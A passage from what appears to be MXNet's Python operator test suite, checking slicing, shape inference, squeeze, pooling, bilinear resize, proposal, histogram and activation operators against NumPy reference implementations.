expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
with mx.np_shape():
var1 = mx.sym.var(name="data", shape=(-1, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (-1, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (-1, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (-1, 3))
var1 = mx.sym.var(name='data', shape=(10, -1))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, -1))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, -1))
@with_seed()
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@with_seed()
@mx.use_np_shape
def test_zero_size_min_max():
def min():
a = mx.nd.zeros(shape=(5, 0))
a.min()
def max():
a = mx.nd.zeros(shape=(5, 0))
a.max()
assert_raises(MXNetError, min)
assert_raises(MXNetError, max)
@with_seed()
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
if out.shape == (1,): # as an exception (1, 1, 1) will be squeezed to (1,)
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
@with_seed()
def test_adaptive_avg_pool_op():
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
def adaptive_avg_pool_frame(x, y):
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
B,C,_,_ = x.shape
y = np.empty([B,C,height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
@with_seed()
def test_bilinear_resize_op():
def py_bilinear_resize(x, outputHeight, outputWidth):
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
w1p = 1 if w1 < (inputWidth - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
def py_bilinear_resize_backward(x, incoming_grads, mode='size'):
data1 = np.zeros_like(x)
data2 = incoming_grads
batchsize = data1.shape[0]
channels = data1.shape[1]
height1 = data1.shape[2]
width1 = data1.shape[3]
height2 = data2.shape[2]
width2 = data2.shape[3]
rheight = float(height1 - 1) / (height2 - 1) if (height2 > 1) else 0
rwidth = float(width1 - 1) / (width2 - 1) if (width2 > 1) else 0
# special case: just copy
if height1 == height2 and width1 == width2:
data1 += data2
return [data1]
for h2 in range(0, height2):
for w2 in range(0, width2):
h1r = rheight * h2
h1 = int(h1r)
h1p = 1 if (h1 < height1 - 1) else 0
h1lambda = h1r - h1
h0lambda = 1 - h1lambda
#
w1r = rwidth * w2
w1 = int(w1r)
w1p = 1 if (w1 < width1 - 1) else 0
w1lambda = w1r - w1
w0lambda = 1 - w1lambda
#
for n in range(0, batchsize):
for c in range(0, channels):
d2val = data2[n][c][h2][w2]
data1[n][c][h1][w1] += h0lambda * w0lambda * d2val
data1[n][c][h1][w1 + w1p] += h0lambda * w1lambda * d2val
data1[n][c][h1 + h1p][w1] += h1lambda * w0lambda * d2val
data1[n][c][h1 + h1p][w1 + w1p] += h1lambda * w1lambda * d2val
if mode == 'like':
return data1, np.zeros_like(incoming_grads)
return [data1]
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y, py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
def check_bilinear_resize_align_corners_op():
img_shape = [1, 1, 3, 2]
data = [64, 32, 32, 64, 50, 100]
target_height = 6
target_width = 4
expected_data = {}
# align_corners = False
expected_data[0] = [
64.000, 56.000, 40.000, 32.000, 56.000, 52.000, 44.000, 40.000, 40.000, 44.000, 52.000, 56.000,
36.500, 45.625, 63.875, 73.000, 45.500, 56.875, 79.625, 91.000, 50.000, 62.500, 87.500, 100.000
]
# align_corners = True
expected_data[1] = [
64.000, 53.333, 42.667, 32.000, 51.200, 49.067, 46.933, 44.800, 38.400, 44.800, 51.200, 57.600,
35.600, 47.467, 59.333, 71.200, 42.800, 57.067, 71.333, 85.600, 50.000, 66.667, 83.333, 100.000
]
x = np.array(data, dtype=np.float32).reshape(img_shape)
x_nd = mx.nd.array(x)
y0 = np.array(expected_data[0]).reshape((1, 1, target_height, target_width))
y0_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=False)
assert_almost_equal(y0, y0_nd.asnumpy(), atol=1e-3)
y1 = np.array(expected_data[1]).reshape((1, 1, target_height, target_width))
y1_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=True)
assert_almost_equal(y1, y1_nd.asnumpy(), atol=1e-3)
def check_bilinear_resize_modes_op(shape, scale_height=None, scale_width=None, shape_1=None, mode=None):
x = mx.nd.random.uniform(shape=shape)
original_h = shape[2]
original_w = shape[3]
if mode == 'odd_scale':
assert scale_height is not None and scale_width is not None
new_h = int(original_h * scale_height) if (original_h % 2) == 0 else \
int((original_h - 1) * scale_height) + 1
new_w = int(original_w * scale_width) if (original_w % 2) == 0 \
else int((original_w - 1) * scale_width) + 1
y = mx.nd.contrib.BilinearResize2D(x, scale_height=scale_height,
scale_width=scale_width,
mode='odd_scale')
elif mode == 'to_even_down':
new_h = original_h if (original_h % 2) == 0 else original_h - 1
new_w = original_w if (original_w % 2) == 0 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_down')
elif mode == 'to_even_up':
new_h = original_h if (original_h % 2) == 0 else original_h + 1
new_w = original_w if (original_w % 2) == 0 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_up')
elif mode == 'to_odd_down':
new_h = original_h if (original_h % 2) == 1 else original_h - 1
new_w = original_w if (original_w % 2) == 1 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_down')
elif mode == 'to_odd_up':
new_h = original_h if (original_h % 2) == 1 else original_h + 1
new_w = original_w if (original_w % 2) == 1 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_up')
elif mode == 'like':
x_1 = mx.nd.random.uniform(shape=shape_1)
new_h = x_1.shape[2]
new_w = x_1.shape[3]
y = mx.nd.contrib.BilinearResize2D(x, x_1, mode='like')
new_shape_desired = np.array([shape[0], shape[1], new_h, new_w], dtype='int')
new_shape_got = np.array(y.shape, dtype='int')
data_sym = mx.sym.var('data')
data_np = x.asnumpy()
expected = py_bilinear_resize(data_np, new_h, new_w)
out_grads = np.ones([shape[0], shape[1], new_h, new_w])
expected_backward = py_bilinear_resize_backward(data_np, out_grads, mode)
assert_array_equal(new_shape_desired, new_shape_got, "Desired and got shapes are not equal. {} vs {}".format(
str(new_shape_desired.tolist()), str(new_shape_got.tolist())))
assert_almost_equal(y.asnumpy(), expected, 1e-3, 0)
if mode != 'like':
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, None, scale_height=scale_height, scale_width=scale_width, mode=mode)
check_symbolic_forward(resize_sym, [data_np], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np], rtol=1e-2, atol=1e-4)
else:
data_sym_like = mx.sym.var('data_like')
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, data_sym_like, mode=mode)
date_np_like = x_1.asnumpy()
check_symbolic_forward(resize_sym, [data_np, date_np_like], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np, date_np_like], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np, date_np_like], rtol=1e-2, atol=1e-4)
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
shape = (2, 2, 20, 20)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape = (2, 2, 21, 21)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape_0 = (2, 2, 21, 21)
shape_1 = (2, 2, 10, 10)
check_bilinear_resize_modes_op(shape_0, shape_1=shape_1, mode='like')
check_bilinear_resize_modes_op(shape_1, shape_1=shape_0, mode='like')
check_bilinear_resize_align_corners_op()
def test_multi_proposal_op():
# paramters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
single_proposal = []
single_score = []
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
expected = [np.zeros_like(e) for e in location]
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
@with_seed()
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
tol = 1e-2 if dtype is np.float16 else 1e-5
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
backward_expected = 2 * a * data_np + b
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output, expected, rtol=tol, atol=tol)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected], rtol=tol, atol=tol)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
[backward_expected], rtol=tol, atol=tol)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
def allclose_function(contexts):
def getRandom(base, percent = 1.):
return base * (1 + percent * (2 * np.random.random_sample() - 1.) / 100)
title = 'exp'
for ctx in contexts:
title += ' cpu' if ctx == mx.cpu() else ' gpu'
title += ' nElem shape'
num_ctx = len(contexts)
result = [False, False]
for dtype in [np.float16, np.float32, np.float64]:
rtol = getRandom(1e-2 if dtype is np.float16 else 1e-5)
atol = getRandom(1e-4 if dtype is np.float16 else 1e-7)
print('\nnumpy.{}: atol = {} rtol = {}'.format(dtype.__name__, atol, rtol))
print(title)
for ndim in range(1, 10):
shape = rand_shape_nd(ndim, 8)
a_np = np.random.randn(*shape).astype(dtype)
b_np = (a_np + np.random.randn(*shape).astype(dtype) / 10000000).astype(dtype)
expected = np.allclose(a_np, b_np, rtol, atol)
for n, ctx in enumerate(contexts):
a_ctx = mx.nd.array(a_np, dtype = dtype, ctx=ctx)
b_ctx = mx.nd.array(b_np, dtype = dtype, ctx=ctx)
output = mx.nd.contrib.allclose(a_ctx, b_ctx, rtol=rtol, atol=atol)
result[n] = output.asnumpy() == 1
if expected != result[n]:
# Preparing the output of elements of the array, which are considered as "not close" AND
# corresponding elements of comparison CPU/GPU/Python vectors, which are considered as "close"
v_ctx = 'CPU' if ctx == mx.cpu() else 'GPU'
if expected:
v_cmp = 'Python'
a_b = a_ctx.asnumpy()
b_b = b_ctx.asnumpy()
a_g = np.asarray(a_np)
b_g = np.asarray(b_np)
else:
v_cmp = v_ctx
v_ctx = 'Python'
a_b = np.asarray(a_np)
b_b = np.asarray(b_np)
a_g = a_ctx.asnumpy()
b_g = b_ctx.asnumpy()
print('\n *** Violations found on %s, but not on %s side ***' % (v_ctx, v_cmp))
frmt = " a[{0:d}]: b[{0:d}]:" \
" abs(a[{0:d}]-b[{0:d}]) - atol + rtol*abs(b[{0:d}]):"
# Define the indices of all violations and corresponding values of coordinates
bad_indexes = np.abs(a_b - b_b) >= atol + rtol * abs(b_b)
a_values = [a_b[bad_indexes], a_g[bad_indexes]]
b_values = [b_b[bad_indexes], b_g[bad_indexes]]
idx = np.asarray(np.where(bad_indexes == True))
idx = idx.reshape(1, idx.size)
idx_flat = np.asarray(np.where(bad_indexes.flatten() == True)).flatten()
for i in range(len(a_values[0])):
flat_idx = idx_flat[i]
print('{}: index = {} flat_index = {}'.format('%4d'%i, idx[i], flat_idx))
print(frmt.format(flat_idx))
for j in range(2):
diff = np.abs(a_values[j][i]-b_values[j][i]) - atol + rtol*abs(b_values[j][i])
print('{}: {} {} {}'.format('%6s'%v_ctx, a_values[j][i], b_values[j][i], diff))
if num_ctx == 1:
print(' {0:d} {1:d} {2:10d} {3:}'.format(expected, result[0], np.prod(shape), shape))
else:
print(' {0:d} {1:d} {2:d} {3:10d} {4:}'.format(expected, result[0], result[1], np.prod(shape), shape))
if expected != result[0] or num_ctx > 1 and expected != result[1]:
assert False
@with_seed()
def test_allclose_function():
allclose_function([default_context()])
@with_seed()
def test_histogram():
def f(x, bins=10, range=None):
return np.histogram(x, bins, range=range)
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1, np_bins1)
assert_almost_equal(mx_histo1, np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2, np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2, np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1.bind(ctx=default_context(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2.bind(ctx=default_context(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
def test_op_output_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=False)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check output names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
if (is_windows):
# Windows doesn't support set environment variable on the fly, so disable it for now
pass
else:
# Disable subgraph in case subgraph will replace symbol
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['pooling_output'])
del os.environ['MXNET_SUBGRAPH_BACKEND']
def test_op_all_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=True)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check all names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
if (is_windows):
# Windows doesn't support set environment variable on the fly, so disable it for now
pass
else:
# Disable subgraph in case subgraph will replace symbol
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['data', 'conv_data', 'conv_weight', 'conv_weight', 'conv_bias', 'conv_bias', 'conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['data', 'deconv_data', 'deconv_weight', 'deconv_weight', 'deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['data', 'fc_data', 'fc_weight', 'fc_weight', 'fc_bias', 'fc_bias', 'fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['data', 'lrn_data', 'lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['data', 'act_input0', 'act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['data', 'concat_arg0', 'data', 'concat_arg1', 'concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'softmax_output'])
length = mx.sym.Variable("length", shape=(10, 10, 10))
sm_sym = mx.sym.softmax(data, length, axis=1, use_length=True, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'length', 'softmax_length', 'softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['data', 'softmax_input0', 'softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['data', 'upsampling_arg0', 'upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['data', 'pooling_data', 'pooling_output'])
del os.environ['MXNET_SUBGRAPH_BACKEND']
@with_seed()
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/13915")
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
-3.0, 3.0],
